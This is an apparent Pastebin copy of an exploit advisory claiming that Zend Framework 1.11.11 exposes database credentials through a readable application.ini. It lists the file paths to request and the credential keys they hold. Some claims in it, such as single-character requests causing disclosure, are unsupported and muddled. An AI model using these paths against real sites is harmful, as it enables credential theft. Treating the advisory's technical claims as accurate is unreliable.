Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Zend Framework 1.11.11 Database Config Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : zend.com
- # Software Download Link : zend.com/en/company/community/framework/downloads
- # Software Information Link : framework.zend.com/changelog/1.11.11
- github.com/feibeck/application.ini
- # Software Affected Version : 1.11.11 and other previous versions.
- Zend Framework 2.4 full - Version: 2.4.9
- Zend Framework + PHP 5.6 Stack : Zend Server Free Trial Version: 8.5.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Zend Framework is a collection of professional PHP packages.
- APPLICATION.INI CheatSheet for your Zend Framework Application
- Collection of all available configuration options via Zend_Application
- and it's bootstrap resources.
- Should work with Zend Framework 1.11.11
- Use this file as application.ini in your applications config folder. Uncomment
- and set all options that your application needs. Alternatively use this file
- as a cheatsheet and copy all needed options to your application.ini.
- ####################################################################
- # Impact :
- ***********
- Zend Framework 1.11.11 [ and other versions ] configuration file may potentially
- disclose sensitive information to remote attackers.
- The configuration file that Zend Framework 1.11.11 stored in /application/configs/application.ini
- HTTP requests consisting of a single character will cause the software to
- disclose sensitive configuration information, including the password/database to the administrative web interface.
- This file is installed, by default, with world readable and possibly world writeable permissions enabled.
- This may have some potentially serious consequences as the configuration
- file also stores password information in plain text.
- This issue occurs because access controls on configuration files are not properly set.
- An attacker can exploit this issue to retrieve potentially sensitive information.
- Attackers can access config file via URL request. This may aid in further attacks.
- ####################################################################
- # Configuration File Disclosure Exploit :
- **********************************
- /application/configs/application.ini
- /application.ini
- resources.db.adapter = ""
- resources.db.params.host = ""
- resources.db.params.username=""
- resources.db.params.password=""
- resources.db.params.dbname=""
- app_db.adapter =
- app_db.config.host =
- app_db.config.username =
- app_db.config.password =
- app_db.config.dbname =
- resources.multidb.name1.adapter =
- resources.multidb.name1.dbname =
- resources.multidb.name1.username =
- resources.multidb.name1.password =
- resources.multidb.name1.host =
- resources.multidb.name1.default =
- resources.multidb.name1.charset =
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement